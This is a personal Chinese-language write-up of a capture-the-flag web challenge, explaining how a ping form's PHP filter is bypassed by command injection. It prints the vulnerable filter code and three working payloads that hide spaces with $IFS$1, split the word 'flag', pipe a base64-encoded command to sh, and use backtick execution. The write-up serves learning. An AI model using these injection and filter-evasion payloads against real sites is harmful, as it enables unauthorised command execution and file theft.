buuctf [GXYCTF2019]Ping Ping Ping 1-刷题个人日记
小白一个,写给自己看。
进去后是这样:
ctrl+u看网页源码也没什么,随便输个数据看看:
源码一样没什么。看题目提示,试试你能想到的方法,比如sql注入:输入ip=1'
不是sql注入,试完了发现是命令执行,输入
/?ip=1;ls
两个都看看,先看index.php输入:
/?ip=1;cat index.php
看来过滤了空格
再输入
/?ip=1;cat$IFS$1index.php
IFS在系统命令里是空格的意思,它的前后面加$
是为了固定这个语句,不然和其他字符串行会出错,后面的$1
是空字符,也可以写成${IFS}
或${IFS}$9
之类的,但{IFS}这个不行,因为{}被过滤了。
/?ip=
PING 1 (0.0.0.1): 56 data bytes
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "
";
print_r($a);
}
?>
第一个if在源码显示
注意这里有些字符看起来是\
其实是|
,意为或。
第一个if里的\x
为十六进制字符开头
第二个if匹配的是空格
第三个if匹配的是bash,后面会讲到,这是其中一种解题方法
第四个if匹配的是flag。.
是匹配一个不是\n
的字符,*
是前一个匹配符匹配0到无数次。简单理解就是在一个字符串(就是我们要写的payload)里f,l,a,g
这四个字符不能顺序出现在任意位置。不管中间隔了什么,如果有a,l,g,f
四个字符,他们连起来是flag,就会die("fxck your flag!");
有三种解法:
1.转义
/?ip=1;a=ag;b=fl;cat$IFS$1$b$a.php
这是ctrl+u的源码。
a和b的位置不能调换,不然就就是在b=fl;a=ag;
里f,l,a,g
这四个字符顺序出现在任意位置,形成flag
第四个if不通过。
2.sh命令
/?ip=1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
这里sh本来是bash,但bash被过滤用sh也行。它们都是shell,bash更好些,shell就是和系统交互的窗口,简单来说相当于编译器。|
是管道符,意思为把|
前的语句执行结果作为|
后面的输入数据。Y2F0IGZsYWcucGhw
base64解码后就是cat flag.php
。base64$IFS$1-d
就是base64 -d
,-d
就是-decode
解码。
整句就是echo Y2F0IGZsYWcucGhw|base64 -d|sh
3.内联执行
/?ip=1;cat$IFS$1`ls`
内联大概就是把反引号内执行后的内容作为我们的payload的一部分
ls
执行后第一行就是flag.php
参考
记 [GXYCTF2019]Ping Ping Ping 1
这是篇写给自己的日记,因为只有自己写得出来而且能让读者看懂才能是真的明白了。写之前我以为我是明白的,写完后才算是真正明白了,写这就是个融会贯通的过程。